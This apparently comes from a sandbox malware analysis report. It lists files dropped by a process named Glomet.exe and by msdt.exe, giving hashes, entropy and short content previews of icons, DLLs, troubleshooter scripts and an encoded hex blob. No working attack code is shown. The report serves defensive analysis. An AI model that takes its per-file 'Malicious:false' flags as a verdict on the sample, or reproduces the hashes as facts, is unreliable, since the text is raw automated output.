                                                                                                                                                                            SHA1:4C5EA7E6244E4E2324A4B622B7FEF0D92CEE67C3
                                                                                                                                                                            SHA-256:D7EEA31EF9ADB3308AAFE8D9FDAD0AC0BF8D6BC1B1150D16B31669F8A9C8D347
                                                                                                                                                                            SHA-512:D829D83F00CA434C97E2678B409DA70F92A3A65320783183D29C236E7CD7B48966D7AEA0F7890FAD966755A9E916F8097198D961225E4E29B6AA2EC890A4F4D3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M2 0a1 1 0 00-1 1v9s-.014.459.23.947C1.475 11.436 2.167 12 3 12h1.832a1 1 0 00.326 0H13s.459.014.947-.23C14.436 11.525 15 10.833 15 10V6a1 1 0 00-1-1H5a1 1 0 00-1 1v4H3V2h2.586l1.707 1.707A1 1 0 008 4h5a1 1 0 100-2H8.414L6.707.293A1 1 0 006 0zm4 7h7v3H6z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal" color="#000" font-weight="400" font-family="sans-serif" overflow="visible" fill-rule="evenodd"/><path d="M2 5h1s0-1 1-1h6L7 1H2z" fill-rule="evenodd"/><path d="M5 6h9v5H5zm8-3h1v1h-1zm1 2h1v1h-1zM4 5h1v1H4zm-2.5 9h13c.277 0 .5.223.5.5v1c0 .277-.22

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\folder-remote.png

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):531
                                                                                                                                                                            Entropy (8bit):6.736727630535467
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7X0Z7HBwN1+swFIz4NqKod/yP3VFHCM0v9oQUs:C0BqE/NqX/kuUs
                                                                                                                                                                            MD5:A2AD58DFE6FC8AD236974230EFD9A6D0
                                                                                                                                                                            SHA1:D9691A9526D441F07F1948FB1563499E66AD75F7
                                                                                                                                                                            SHA-256:6ABF10548D28503337123DDB1483668B5E4F5ED6CE9AF6C958DEF5A6D76E15C6
                                                                                                                                                                            SHA-512:CC32EDE037DE2DA98D96C8D0B258F27AFD3C7CC7E4D6EBF8E9E092CF74846FC041DE014A344535D7996D6E602CD5B8A2E047E14A8ABB988171BAD02E6BEE804F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR.............(-.S....sBIT.....O.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Folder Icons.._.....tEXtAuthor.Lapo Calamandrei..*...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb....]PLTE...............xv|...........................wv{..........................................<....tRNS.@NRX..........i.8....fIDAT.W........a..'RI.....Cf..Z.5....`,H...!.a<=.^MS.+>....v9p+..\.....{a...G...LK.w...df/.l.!..>..5..9;q......IEND.B`.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\format-text-direction-symbolic-rtl.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1503
                                                                                                                                                                            Entropy (8bit):5.15394138748218
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:t4CBGMMAhONiWGzFk1wgaqV4AeW0WRjgnRcG1IoAeW0ayyKbRAecFxV0L:gMmklOV4AeIRjacYIoAeQyNtAecFu
                                                                                                                                                                            MD5:1C15A6D0FA6065F5004770EA2876B446
                                                                                                                                                                            SHA1:BFDB465A2FC2B8BA60FC9BEE5CB03D65156F1D20
                                                                                                                                                                            SHA-256:DC5A830CBB258F5B7EB5422C7059F6A0578821D9549A9603CA3C22E4749B6F80
                                                                                                                                                                            SHA-512:02309FE57B9CA42D65FA9C4B93FCB6A003D698D0FC47EF03EEFCDA0163B7C715FC6438A3CED7164839EED3412EC40BA1CF35B88AF0A40D7774B93BE7F1879F6C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" fill="#474747"><path d="M6 .05v2h6c.428 0 1 .613 1 1v1H8c-.92 0-1.735.383-2.25.968A3.017 3.017 0 005 7.049c.006.72.27 1.453.781 2.032.513.578 1.31.968 2.22.968h7v-7a3 3 0 00-3-3zm2 6h5v2H8c-.398 0-.567-.11-.719-.282a1.144 1.144 0 01-.28-.719 1.11 1.11 0 01.25-.718c.144-.166.327-.282.75-.282z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-size="xx-small" font-family="Sans" overflow="visible"/><path d="M4 15H3c-.265 0-.53-.093-.719-.281l-2-2L0 12.437v-.874l.281-.282 2-2C2.47 9.093 2.735 9 3 9h1v1c0 .265-.093.53-.281.719L2.438 12l1.28 1.281c.189.188.282.454.282.719v1z" style="line-height:normal;-inkscape-font-specification:'Bitstream Vera Sans';text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Bitstream Vera Sans" overflow="visible"/>

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\go-next-symbolic-rtl.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):665
                                                                                                                                                                            Entropy (8bit):4.455633152585391
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdPnnl/nu3tlnpZo4iL+o0JWlzkmvtoWlz9vtoWlzKzmdwWlzFzmdwWlM:2dPnnxu3tlTtiL+rJPmvto0vtojzmdw6
                                                                                                                                                                            MD5:D3329B3FDCE276378BC23A2B04EFF6FA
                                                                                                                                                                            SHA1:1DF694D08D03F1C7C86AB6234507A9364EC5C4E8
                                                                                                                                                                            SHA-256:0D26FB049E369AAD5E7ED901B3A255317A4A465008E89026FDE9F624124E2599
                                                                                                                                                                            SHA-512:2C4624461FAC6CD5093B8B7818DA17B909A302A216364ABCDD467131EA2C49E2BDCA3E546F69030E4812439F86986F747688EA0F9732CAE053F697A8C3F08B0D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11.707031 2.707031 l -1.414062 -1.414062 l -6.707031 6.707031 l 6.707031 6.707031 l 1.414062 -1.414062 l -5.292969 -5.292969 z m 0 0"/>. <path d="m 11 15 h 1 v -1 h -1 z m 0 0"/>. <path d="m 11 2 h 1 v -1 h -1 z m 0 0"/>. <path d="m 11 3 c 0.554688 0 1 -0.445312 1 -1 s -0.445312 -1 -1 -1 s -1 0.445312 -1 1 s 0.445312 1 1 1 z m 0 0"/>. <path d="m 11 15 c 0.554688 0 1 -0.445312 1 -1 s -0.445312 -1 -1 -1 s -1 0.445312 -1 1 s 0.445312 1 1 1 z m 0 0"/>. </g>.</svg>.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\input-gaming-symbolic.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):813
                                                                                                                                                                            Entropy (8bit):4.179382815877168
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:t4CGf211LJnGKC2HKYVYmtPiCoPx9xCoPx9PiCoPx9xCoPx9Z5GulN:H1D9CF2ICofxCofaCofxCofWi
                                                                                                                                                                            MD5:9CC12578610A2319C0B94FD82AADEFDA
                                                                                                                                                                            SHA1:DB7CFE14B2BE0068FED279B51363D1810FAA71CF
                                                                                                                                                                            SHA-256:6A61D206C4FA4DF208EF0B6FE28ECF92DC55A370EB2EEA3049BFF7A0F469D62D
                                                                                                                                                                            SHA-512:383BC6013053A3F067B7D577D7BCDB8B5E7207D7586679BB238B66D87078C2A5E9D8DE87D03B31B2556669B4DA25411FD7EA7B2BCBAE974FFB2B719ACE7E0429
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2.246 3c-.153 0-.256.073-.291.203L.26 11.824C.035 12.67 1.821 13.681 3 13l2.75-4h4.5L13 13c1.178.68 2.965-.33 2.738-1.176l-1.693-8.62c-.035-.131-.14-.204-.291-.204zM4.25 4h.5a.25.25 0 01.25.25V5h.75a.25.25 0 01.25.25v.5a.25.25 0 01-.25.25H5v.75a.25.25 0 01-.25.25h-.5A.25.25 0 014 6.75V6h-.75A.25.25 0 013 5.75v-.5A.25.25 0 013.25 5H4v-.75A.25.25 0 014.25 4zm7.214 0a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5zm-1 1a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5zm2 0a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5zm-1 1a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5z" color="#000" overflow="visible" fill="#2e3436"/></svg>

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):195475
                                                                                                                                                                            Entropy (8bit):6.311646239368264
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:y6YP6gSQWAVNKXYWwwrA8j7S+rJkWAA+El7t7s98vh1ukZGSkW5QF3i:y9TBYA8jDrJjEEl7dsSv5wE5QF3i
                                                                                                                                                                            MD5:AB7B411DD06BFCDA8CBAD32D655E88C0
                                                                                                                                                                            SHA1:8EC6C8BF8B479FE712442FBB197E77557962C3ED
                                                                                                                                                                            SHA-256:13B0E129029141811EC8E7494E093F7B932CBF0E101CD059CCF50442F84137F0
                                                                                                                                                                            SHA-512:8B86A4F3C4A1DE72C5D7F043C73417792D598B272EA884B33CE9755F3D53551D050F4AD8D32C469AFA1166369D4C7E965A599B53657B3B889E98A7A67DE06E4B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........6.....&"...%.d..........P.....................................................`... ..........................................#...@...............................p.............................. ...(....................A...............................text...hc.......d..................`..`.data................h..............@....rdata...#.......$...l..............@..@.pdata..............................@..@.xdata..............................@..@.bss....0................................edata...#.......$..................@..@.idata.......@......................@....CRT....X....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\network-cellular-4g-symbolic.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):544
                                                                                                                                                                            Entropy (8bit):4.840636545565347
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:t4CDqsLWbjUzkTWem7+0qoLIGYJJufPm3ioprGDRl+i:t4CdLWbjUgSl8sfPAnrGDRlN
                                                                                                                                                                            MD5:6CD1ED8B1D8500C9A1480425DA4282D6
                                                                                                                                                                            SHA1:F1B935DD259BCD198784C1C2FA6516230624C43B
                                                                                                                                                                            SHA-256:FAD0ECD186B6DEC11FBB094876E7381B2A097E1EF9D641527E3295132410EF44
                                                                                                                                                                            SHA-512:6BC432608A3630136E2E8E44F69A81B9C5F9FE479DA5DD3E35A77168A66F3C41D72DC0E49FB623E74B9527CF031FBBBE447213CE4C0FDFDA4A9AB41043997701
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2.063 0A2.048 2.048 0 000 2.063v11.874C0 15.088.912 16 2.063 16h11.874A2.048 2.048 0 0016 13.937V2.063A2.048 2.048 0 0013.937 0zM2 3h2v4h1V3h2v10H5V9H4c-1 0-2-.842-2-2zm8 0h2c.833 0 1.525.564 1.77 1.053.244.488.23.947.23.947v1h-2V5h-2v6h2V9h-1V7h3v4s.014.459-.23.947C13.525 12.436 12.833 13 12 13h-2s-.459.014-.947-.23C8.564 12.525 8 11.833 8 11V5s-.014-.459.23-.947C8.475 3.564 9.167 3 10 3z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/></svg>

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\network-server.png

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):718
                                                                                                                                                                            Entropy (8bit):7.267310509580342
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7maZB4RO4HE+swFIUyrlxSTWLCMpffTn0589Gug9Beu1qG6Fh1ClN:tak15ypxST1MpffTAjv9R1dujmN
                                                                                                                                                                            MD5:151CC83E1B8F2239625A521AD3889884
                                                                                                                                                                            SHA1:F6951B61B7BE182EE6493DD7CB02DDF5EBE2BCB3
                                                                                                                                                                            SHA-256:B698DFD02677369423FDA9D0A2C499A1B7788A4AA3D500D20E1DFBDC47E64599
                                                                                                                                                                            SHA-512:A23168D29CFF32344EEA6C2D2895FD8055C5318074C0EE34DCEEC391630350E98A9D8813736ADB49EE87D8B2F02FE219E08811F569887F846D400D92A66DD085
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR................a....pHYs..........o.d....tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Icon Template...?....tEXtAuthor.GNOME Design Team`.v~...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb.....IDAT8...Ok.Q...w&.S.V.....`..&P?..].N..R........Eq..Ih.....d..CG.vH'..<.m.M"8xW.w...R(l.V?Vnz.'..)e].6........i...Y)...TTZ..e....&..{..r...h.a...PJ...p..D..A.C|.GX..~E[.v.l....>{.G..#..\.%...u.(.\.`...z=...ss.qw\>mm....@_~...[...L.c.1..*..4..O.q.,^b"5.@..>..+...".F..."9...j....L.G.....J.../.[....TJ..b..X|.....Q*.74M.k..J....pt{A..~.......a.2..z..n.w.M...P..~6s.........l~.m.`...w....?~.2.....WQ...d..e...Yc.-..{._b....K....IEND.B`.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):55840
                                                                                                                                                                            Entropy (8bit):6.008705338773632
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:8BBwicLb8BQ+2IBft6q4Pro6tQ+/Gy9sKLAmIybD:8BWxP+rPePro6j/3sKLhD
                                                                                                                                                                            MD5:BCE3974EB6C6A535062A8D1EAF757513
                                                                                                                                                                            SHA1:1D1D167D8E4B93D40273A43CEBE2AEE5599802DF
                                                                                                                                                                            SHA-256:32CFB6C0DA4A3E91E1E99C50003637ED2C1A2102211FA5ACFA3A9FE3100A7B8D
                                                                                                                                                                            SHA-512:46F30B5217AAD17E63A1921E5E05B3560EABB0F8A17E3487A6E6BBF5A0E2297D711F632D3749963D0E5FA96398E21C5D06C7B3EFFBD97A3D196FDC88121B7F61
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V...V...V......V.....V..>Y...V...V..V......V......V..Rich.V..................PE..L....r.I.................p...@....................@..................................i..........................................<....................... ..............................................@............................................text....d.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\immittance\tittes\RETSLRDE.Dia

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41530
                                                                                                                                                                            Entropy (8bit):3.999180462095621
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:DiaxmqDXVWovL0uIlEwE3b/nDqRF+pVqQ7pNzc4jS3Xzv:VZxvoPW3b/nwFKVqQ7pNrS3Dv
                                                                                                                                                                            MD5:8ED01FEB000559F0E18E19581A5B3245
                                                                                                                                                                            SHA1:5805E6418819B1B24070B60028A2BBC2D24B5AAC
                                                                                                                                                                            SHA-256:4B88075A532A4182CB052E2117ED0399E0E503480F9B644605C97BEF3E59FD72
                                                                                                                                                                            SHA-512:879E1577E17E3C6C1388457B2526F26B5FB391D6C1D6C4115A21310DB9C1E918B3BCB8635CD423F546D8304C11426E2A21EAE7230D11CCB88591AF71415F48F2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:A79AB65A39B86831BB8D196C1F2A6438ABE9F56B1C2E8FF240F8B93DEFD45FDAC5769AF8403E103D7D1F0C81E2DA010918145F4E40FAF2635AB7EE50E29E317241D57D2954AE3A04AF44D76AB5D84B512AF352CC882D3C894233E76B15D144D4B27A9540CA07870146528417A605B7C02721C7351B35511DA4393EAAEE6EA0C5E913C7EB09C5E4D14D056BE7EEC54B3675363A901927BC208BB6EE63FB6D096C1A38FCD1AAD2D79DE16A772A81139B11FA2E9694754C7EEF9578DD6EA2E0171A782F9E4E0DCEFE2C1AC08029351E8AF4BA4F7A1821AF8B4E41570BC65419BE971A8F49F435731809AF420350245FE077E6C1569310795418C8D56D6E6E780FB55D0EFFAF971B8F220C3986604A37756C39F0365039B7C4A4A502AC50B71314256D83ACC321F3C889DDA59890C00C2F53D5682D235CD8BEC2C9AE31A70B848B1A3D0789CF5769D51C0CE0CCCA365631355D22C2D0B67DDEDF27FE9F69753CE7F7EA5FE234E3F64552922DE4BEE15BFB47C895B06D4133873EEC24C12E721C0492E560AB00A3CA9E3D2544A5A63304821C9FAE0344E0007AB74F334532BB40D6BADDF51CF7A67DD33554820A508DD882A4984F9E477F24B32AE516A48D42ABEFAE48446842470DC76AA75CD07EE0ECD017DC7D2C3F51DAA66EF7E7D6E6B436B4DD353FC3BBDAF4C91A071B36411D0679E69B7FA5C4

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.diagpkg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                            Malicious:false
